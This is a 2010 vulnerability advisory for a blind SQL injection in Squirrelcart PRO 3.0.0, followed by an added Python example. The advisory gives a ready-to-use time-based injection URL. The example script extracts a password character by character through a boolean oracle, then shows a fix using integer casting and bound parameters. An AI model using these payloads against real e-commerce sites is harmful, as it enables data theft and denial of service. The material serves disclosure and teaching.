Squirrelcart PRO 3.0.0 Blind SQL Injection Vulnerability

Name               Squirrelcart PRO
Vendor             http://www.squirrelcart.com
Versions Affected  3.0.0
Author             Salvatore Fresta aka Drosophila
Website            http://www.salvatorefresta.net
Contact            salvatorefresta [at] gmail [dot] com
Date               2010-10-21

X. INDEX

I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX

I. ABOUT THE APPLICATION
________________________

Squirrelcart PRO is a commercial PHP/MySQL e-commerce system. I tested only
the demo version. Other versions could be vulnerable. I obtained the demo's
version number from the staff.

II. DESCRIPTION
_______________

A parameter is not properly sanitised before being used in a SQL query.

III. ANALYSIS
_____________

Summary:

A) Blind SQL Injection

A) Blind SQL Injection
______________________

The prod_rn parameter in index.php, when add_to_cart is set to a positive
value, is not properly sanitised before being used in a SQL query. This can
be exploited to manipulate SQL queries by injecting arbitrary SQL code.

This vulnerability does not require being logged in. Successful exploitation
requires that the first part of the injection (271 in the sample code) be a
valid product number (see the products list).

The sample payload is a time-based oracle: 0x41=0x41 is always true, so the
IF() branch runs BENCHMARK() and the response stalls noticeably, which
confirms the injection even though no query output is shown. Note that a
count of 9999999999 will keep the database busy for a long time; a tester
should use a much smaller count to avoid denying service to the site.

IV. SAMPLE CODE
_______________

A) Blind SQL Injection

http://site/path/index.php?add_to_cart=10&prod_rn=271 AND (SELECT(IF(0x41=0x41, BENCHMARK(9999999999,NULL),NULL)))

V. FIX
______

No fix.
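The following is an added illustration of the bug class reported in section III and of the remediation that section V says is missing; it is not Squirrelcart code. The advisory does not show the vulnerable source, so the table, column names and query shape are assumptions, and SQLite stands in for MySQL, which means the BENCHMARK() timing primitive of the sample URL is replaced by a boolean condition the attacker controls (same AND-based injection point, different oracle). The users table and its password are constructed sample data.

```python
"""Blind SQL injection through a product-number parameter, and its fix.

Added example, not part of the original advisory or of Squirrelcart.
Assumptions: a products table keyed by rn, a query of the form
SELECT ... WHERE rn = <prod_rn>, and a users table to extract from.
"""
import sqlite3


def make_db():
    """Constructed sample database; the admin password is made-up data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (rn INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(270, "Widget", 9.99), (271, "Gadget", 19.99), (272, "Gizmo", 4.50)],
    )
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'secret')")
    return conn


def lookup_vulnerable(conn, prod_rn):
    """Splices the untrusted parameter straight into the query (the bug class
    the advisory reports). Returns the product name or None."""
    sql = "SELECT name FROM products WHERE rn = " + prod_rn
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_fixed(conn, prod_rn):
    """Hardened form: enforce the integer type, then bind the value as a
    parameter so it can never change the query structure."""
    try:
        rn = int(prod_rn)
    except (TypeError, ValueError):
        return None  # anything that is not a product number is rejected
    row = conn.execute("SELECT name FROM products WHERE rn = ?", (rn,)).fetchone()
    return row[0] if row else None


def blind_oracle(conn, lookup, condition):
    """One blind probe in the shape of the advisory's URL: a known-valid
    product number (271) ANDed with an attacker-chosen condition. A row
    comes back only when the condition is true."""
    payload = "271 AND (" + condition + ")"
    return lookup(conn, payload) is not None


def extract_password(conn, lookup, max_len=16):
    """Boolean-based extraction: recover the admin password one character
    at a time by asking the oracle a yes/no question per candidate."""
    recovered = ""
    for pos in range(1, max_len + 1):
        found = None
        for c in "abcdefghijklmnopqrstuvwxyz0123456789":
            cond = (
                "(SELECT substr(password,%d,1) FROM users WHERE name='admin') = '%s'"
                % (pos, c)
            )
            if blind_oracle(conn, lookup, cond):
                found = c
                break
        if found is None:
            break  # no candidate matched: end of string reached
        recovered += found
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", extract_password(db, lookup_vulnerable))
    print("fixed     :", repr(extract_password(db, lookup_fixed)))
```

Against lookup_vulnerable the oracle answers truthfully and the loop recovers the whole password without ever seeing query output, which is exactly what "blind" means here; against lookup_fixed the int() check refuses the payload before it reaches the database, so every probe answers "no" and nothing is recovered. Casting to an integer is sufficient for a purely numeric field like prod_rn, and binding the parameter protects the query even if the field is later widened to accept strings.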